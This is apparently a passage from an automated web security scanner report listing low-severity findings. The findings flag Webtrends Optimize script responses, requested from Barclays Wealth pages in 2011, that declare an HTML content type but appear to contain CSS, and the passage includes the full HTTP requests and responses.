Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=366C424481F456C6E4820AE57695F69C; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d01953baa; _wt.mode-79569=fcdcc722e93200feed40

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:12 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=46EC8A693A8B058A0B9D418F6DDAF0B4; Path=/ots
Set-Cookie: _wt.mode-79569=fcdcc722e93201eda062; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; Expires=Sun, 01-Jan-2012 00:02:13 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.50. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c319b371e20d5ad0b40a14440bb04b4f5dc0dbfd8bc62a028eccbe38ed5053c56037d2ecb936ad8922b955414ac716ea905366cd9eafd20cc3a6a141382d0d868350ea1bc32e35d8473431a7b1788ba3f5a3f22ae101e47545dd791fef2c553da4a6ea6d0830c36fa15a39f127d6d40bcd1edca75d20c8a340f8602cc7079cfc5dee0e8412c90521ea705ba06acc46886427f6e66c9819af4f8f3a2d6a200cd28095a794607dcff6fbce9fcce9c7bfdf517a53a48a9e81950b1f16d0177c1e9750d153047273d5069f18aaf0b3f956e5390a5fb1612353317f9b325f37332df0b97a7f9f37204b6747463b07969349cb9aa6b27eb4042ddf27b46e16437a69ece3bc31535f1140bc2bd8b4c3fe40891a559fdd2316fd4c951a5efa70ff90039cab73ae8cb63d584c62b375a0ab1a2b6c0623cd986b1a4c856899fef33ea0c1affe0d8d6bf1400d26527edbc646525d5701baed4d1d5f8fb088110a14efb0ee1ed507b31318da9deb9be3630c784eb31f942b04206efe59e57d918ef5ca0c3e62a254ce4f8583e8b6cd243a513901a1cd069c1b03a0fad059bdc8f924888ea6826a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fbab01c207770e811752977a9fdea3c2edd93705d9ae0b159bd52ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce7240efd4913d696e9b747f4ca7f69ed2f47a77c1f267838e9909366e35c6ea1be13aab2582a10da3aa45c347aff1c1a5d657f031f1c4c18b8c1ba1d010a97aa5129dda6a3db710e1811f8242ae6da1e341b3b7341a89bf7142b5714c9ef18c2df50b8054b7267c6fb2e60d8e291e41f535924eeee9d08acaff57c2041071bb307ff26acbe11900302b2ed94f3c95aaa11236f117959ab1de1cc8334ca0a0d89a8e2aad85237b6e4cd8d63267d20ef26d572726602b6b0b03004f776a650b9b1df3fb8200745f7c3617ad157a34076896f957260a99ace901d39176c9821effa0ea05188d7b2d4da65a344fe16649d1c1e9256695dff6e6ad8db250af6a1b82f665d6fd0b2e01a9bf1dafb3fbd71c3c36a4b2811bd001f598b3 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4B58DD7DB5603E2D9048FE4EA69A8782; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200599559; _wt.control-79569-ta_11ApplyNowStep2ABn=f4be6fb10e561e19b362e17be8e54985a21e7d8c08da7565c9f725264895b2de21195dd232f468eb32a502163635a3366bc906e51ea492f77d4072456b73d3258873d1d51fd5a6e43f8c56ecc851bb0bfa65887ddf50cc1df578ccf8210063e053; _wt.mode-79569=fcdcc722e9320537bb59

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:15 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: _wt.mode-79569=e1f36dbd085f00297bec; Path=/
Set-Cookie: _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc2002e7571; Expires=Sun, 01-Jan-2012 00:02:16 GMT; Path=/
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 44561


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.51. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b9428d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

